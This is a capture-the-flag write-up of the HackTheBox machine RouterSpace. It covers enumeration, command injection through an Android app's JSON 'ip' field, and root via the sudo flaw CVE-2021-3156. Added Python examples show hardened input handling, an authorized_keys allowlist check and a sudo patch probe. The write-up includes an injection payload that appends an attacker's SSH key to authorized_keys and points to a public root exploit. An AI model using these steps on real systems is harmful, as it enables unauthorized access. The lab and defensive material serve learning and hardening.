d3vyce 095a13b2c9
add: writeup-ctf
2024-03-02 21:49:07 +01:00


---
title: "Writeup - RouterSpace (HTB)"
date: 2022-04-05
slug: "writeup-routerspace-htb"
type: "writeup-ctf"
---
This is a writeup for the [RouterSpace](https://app.hackthebox.com/machines/RouterSpace) machine from the HackTheBox site.
## Enumeration
First, let's start with a scan of our target with the following command:
```bash
nmap -sV 10.129.175.15
```
Two TCP ports are discovered:
![](img/image-1.webp)
- 22/tcp : SSH port
- 80/tcp : HTTP web server
Let's go to the site and see if we can find some information.
![](img/image-2.webp)
The site presents us with an application to connect our router to "routerspace". In addition to this information we have the possibility to download the application in .apk format.
## Exploit
I first tried to analyze the application with [APKtool](https://www.kali.org/tools/apktool/). But I didn't find anything special. So I will try to install it with the help of an emulator.
After testing several emulation solutions, I finally chose Anbox. To install it on Kali I followed this guide:
[How to install Anbox on Debian](https://dev.to/sbellone/how-to-install-anbox-on-debian-1hjd)
After starting Anbox, I start Burp listening on all interfaces, then I point adb at the Burp proxy with the following command:
```bash
adb shell settings put global http_proxy 192.168.250.1:8080
```
I then install the application with the following command:
```bash
adb install RouterSpace.apk
```
After starting the application and testing the connection, I notice that Burp is intercepting requests to "http://routerspace.htb". So I add this domain to the "/etc/hosts" file.
![](img/image-3.webp)
While analyzing the packet sent by the application, I notice a JSON "ip" field.
![](img/image-4.webp)
By appending a ";" to the value, I can inject a command that the remote host executes. Perfect!
After a few tests I realize that I can't get a reverse shell back; there are possibly firewall rules blocking it. To be confirmed...
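The injection described above comes from concatenating the "ip" value into a shell command. Below is an added example in Python, not code from the writeup or from the RouterSpace application (whose backend is not shown): a deliberately vulnerable command builder next to a hardened one that validates the value with `ipaddress` and executes it as an argv list with no shell involved. It assumes the backend runs a ping-style check against the supplied address; the sample values are constructed.

```python
import ipaddress
import subprocess

# Constructed sample values: a normal request and the ";"-style payload from
# the writeup (the public key is a placeholder, as in the writeup).
NORMAL_IP = "10.10.14.5"
INJECTED_IP = "10.10.14.5;echo 'ssh-rsa [public_key] kali@kali'>> ~/.ssh/authorized_keys"


def build_command_vulnerable(ip: str) -> str:
    """The pattern the writeup abuses: the JSON 'ip' value is interpolated into
    a command line that is later handed to a shell (shell=True / system()).
    Returned as a string so the reader can see exactly what the shell gets."""
    return f"ping -c 1 {ip}"


def shell_sees_extra_command(command: str) -> bool:
    """A shell treats an unquoted ';' as a command separator, so everything
    after it in the built string runs as a second command."""
    return ";" in command


def build_command_hardened(ip: str) -> list:
    """Hardened form: validate that the value is an IP address, then pass it as
    a single argv element. A valid address cannot contain shell metacharacters
    and cannot start with '-', so neither command injection nor option
    injection against ping is possible."""
    try:
        ipaddress.ip_address(ip)  # raises ValueError for anything that is not an IP
    except ValueError:
        raise ValueError(f"rejected non-IP value: {ip!r}") from None
    return ["ping", "-c", "1", ip]


def is_accepted(ip: str) -> bool:
    """Does the hardened builder accept this value?"""
    try:
        build_command_hardened(ip)
        return True
    except ValueError:
        return False


def run_hardened(ip: str) -> subprocess.CompletedProcess:
    """How the hardened command is executed: argv list, shell=False (default)."""
    return subprocess.run(build_command_hardened(ip), capture_output=True, text=True, timeout=5)


if __name__ == "__main__":
    print("vulnerable builder produces:", build_command_vulnerable(INJECTED_IP))
    print("hardened accepts injected value:", is_accepted(INJECTED_IP))
    print("hardened accepts normal value:", is_accepted(NORMAL_IP))
```

The validation is the real control: a metacharacter blocklist would miss encodings and alternative separators, whereas `ipaddress.ip_address` only accepts a well-formed IPv4 or IPv6 literal, and passing argv without a shell removes the interpreter that made ";" meaningful in the first place.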
Another solution is to use SSH to get access. I check if there is a '.ssh' folder for the user paul:
![](img/image-5.webp)
It exists, so I generate keys:
```bash
┌──(kali㉿kali)-[~]
└─$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:UbAb/Eaflsqf/Wneee+yy26b+ZymMNXYfXH7oxac8/E kali@kali
The key's randomart image is:
+---[RSA 3072]----+
| ... |
| . o |
| = . ..|
| * . o+ =|
| S o *o.+o|
| o o.= .o|
| oo +.+|
| .o=+BE|
| +=#&X|
+----[SHA256]-----+
```
Then I add my public key to the "authorized_keys" file with the following payload:
```json
"ip":";echo 'ssh-rsa [public_key] kali@kali'>> ~/.ssh/authorized_keys"
```
I can now connect in SSH and get the first flag.
![](img/image-6.webp)
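An authorized_keys entry dropped by an injected command is exactly what a host-integrity check should catch. The following Python snippet is an added example, not code from the writeup: it parses an authorized_keys file, computes the SHA256 fingerprint of each key the way ssh-keygen prints it (the same form as the fingerprint in the key-generation output above), and reports entries whose fingerprint is not on an allowlist. The key blobs are built from toy RSA moduli constructed inline so the example runs offline; the allowlist and the "kali@kali" comment are sample values.

```python
import base64
import hashlib
import struct


def _ssh_string(data: bytes) -> bytes:
    """RFC 4251 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def _ssh_mpint(n: int) -> bytes:
    """RFC 4251 'mpint' for a positive integer (leading 0x00 if the high bit is set)."""
    return _ssh_string(n.to_bytes((n.bit_length() + 8) // 8, "big"))


def build_rsa_blob(e: int, n: int) -> str:
    """Base64 body of an ssh-rsa public key in wire format. Constructed here
    from a toy modulus; only the encoding matters for fingerprinting."""
    return base64.b64encode(_ssh_string(b"ssh-rsa") + _ssh_mpint(e) + _ssh_mpint(n)).decode()


def fingerprint(blob_b64: str) -> str:
    """SHA256 fingerprint in the form ssh-keygen prints: base64 without '=' padding."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str) -> list:
    """Return (key_type, blob, comment) per entry. Options such as from="..."
    may precede the key type; quoted options containing spaces are not handled."""
    entries = []
    for line in text.splitlines():
        fields = line.strip().split()
        if not fields or fields[0].startswith("#"):
            continue
        for i, field in enumerate(fields):
            if field.startswith(("ssh-", "ecdsa-", "sk-")) and i + 1 < len(fields):
                entries.append((field, fields[i + 1], " ".join(fields[i + 2:])))
                break
    return entries


def unexpected_keys(text: str, allowed_fingerprints: set) -> list:
    """Entries whose fingerprint is not on the allowlist, as (fingerprint, comment)."""
    return [
        (fingerprint(blob), comment)
        for _, blob, comment in parse_authorized_keys(text)
        if fingerprint(blob) not in allowed_fingerprints
    ]


# Constructed sample data: an expected admin key and a key planted by an attacker.
KNOWN_BLOB = build_rsa_blob(65537, 0xC9A1F3E7D5B2914F6A8E0C3D7F1B5A9E3C2D4F6A8B0C1D2E3F4A5B6C7D8E9F01)
PLANTED_BLOB = build_rsa_blob(65537, 0xA7E3C9D1F5B8024E6C1A9D3F7E5B2C8A4D0F6E1B3C5A7D9F2E4C6A8B0D1F3E57)
ALLOWLIST = {fingerprint(KNOWN_BLOB)}
SAMPLE_AUTHORIZED_KEYS = f"""# paul's keys
ssh-rsa {KNOWN_BLOB} admin@workstation
ssh-rsa {PLANTED_BLOB} kali@kali
"""

if __name__ == "__main__":
    for fp, comment in unexpected_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWLIST):
        print(f"unexpected key {fp} ({comment})")
```

Comparing fingerprints rather than raw lines means a key re-added with a different comment or options is still recognised, and the allowlist can be fed straight from the `ssh-keygen -lf` output of the keys an operator actually issued.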
## Privilege escalation
To start, I'll use [linPeas](https://linpeas.sh/) to do a first pass looking for privilege-escalation vectors on the machine. But I do get the impression that iptables rules are blocking my requests:
![](img/image-7.webp)
To transfer my file I will use "scp" with the following command:
```bash
┌──(kali㉿kali)-[~]
└─$ scp linpeas.sh paul@10.10.11.148:~/
linpeas.sh 100% 748KB 8.4MB/s 00:00
```
After running the script, I notice that the machine uses a version of sudo that is exploitable (CVE-2021-3156). After some research I find this script, which creates a root shell:
{{< github repo="mohinparamasivam/Sudo-1.8.31-Root-Exploit" >}}
And indeed after executing the code, I get a root shell and I can recover the last flag!
![](img/image-8.webp)
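Checking whether a host is still exposed to CVE-2021-3156 is the defender's counterpart of the step above. The following Python helper is an added example, not code from the writeup or from the linked repository: it encodes the affected version ranges published in the Qualys advisory for this CVE (1.8.2 to 1.8.31p2 and 1.9.0 to 1.9.5p1, fixed in 1.9.5p2) and interprets the advisory's `sudoedit -s /` probe. The probe outputs below are constructed samples modelled on the advisory's description; distribution packages often backport the fix without bumping the version, so the version check is only a hint and the probe result is the reliable signal.

```python
import re
import subprocess

# Affected ranges from the Qualys advisory for CVE-2021-3156 ("Baron Samedit"):
# legacy 1.8.2 .. 1.8.31p2 and stable 1.9.0 .. 1.9.5p1; fixed in 1.9.5p2.
LEGACY_RANGE = ((1, 8, 2, 0), (1, 8, 31, 2))
STABLE_RANGE = ((1, 9, 0, 0), (1, 9, 5, 1))

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(text: str) -> tuple:
    """Turn 'Sudo version 1.8.31' or '1.9.5p2' into (major, minor, patch, plevel)."""
    m = _VERSION_RE.search(text)
    if m is None:
        raise ValueError(f"no sudo version found in {text!r}")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def version_in_affected_range(version: tuple) -> bool:
    """True when the upstream version number falls inside a range the advisory
    lists. Distros backport fixes without bumping the version, so this is a hint."""
    return any(low <= version <= high for low, high in (LEGACY_RANGE, STABLE_RANGE))


def interpret_sudoedit_probe(output: str) -> str:
    """Interpret the output of running `sudoedit -s /` as an unprivileged user,
    the test the advisory recommends: a message starting with 'sudoedit:' means
    the faulty argument handling is still present, one starting with 'usage:'
    means the fixed handling rejects the combination."""
    first = output.strip().splitlines()[0] if output.strip() else ""
    if first.startswith("sudoedit:"):
        return "vulnerable"
    if first.startswith("usage:"):
        return "patched"
    return "unknown"


def probe_local_sudoedit() -> str:
    """Run the probe on this host (the message arrives on stderr). Not exercised
    by the constructed samples below; call it on a real system to check patch state."""
    proc = subprocess.run(["sudoedit", "-s", "/"], capture_output=True, text=True, timeout=10)
    return interpret_sudoedit_probe(proc.stderr + proc.stdout)


# Constructed sample outputs, modelled on the advisory's description of the probe.
SAMPLE_VULNERABLE = "sudoedit: /: not a regular file\n"
SAMPLE_PATCHED = "usage: sudoedit [-AknS] [-r role] [-t type] [-C num] ...\n"

if __name__ == "__main__":
    print("1.8.31 in affected range:", version_in_affected_range(parse_sudo_version("Sudo version 1.8.31")))
    print("sample probe results:", interpret_sudoedit_probe(SAMPLE_VULNERABLE), interpret_sudoedit_probe(SAMPLE_PATCHED))
```

On a fleet, pair the probe with the package manager's changelog rather than `sudo --version` alone: an Ubuntu 1.8.31 package with the security update applied reports the same upstream version as the unpatched one.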
## Recommendations
To patch this host I think it would be necessary to perform a number of actions:
- Fix the application to prevent command injection
- Run the service as a user who does not have SSH access
- Update sudo to a patched version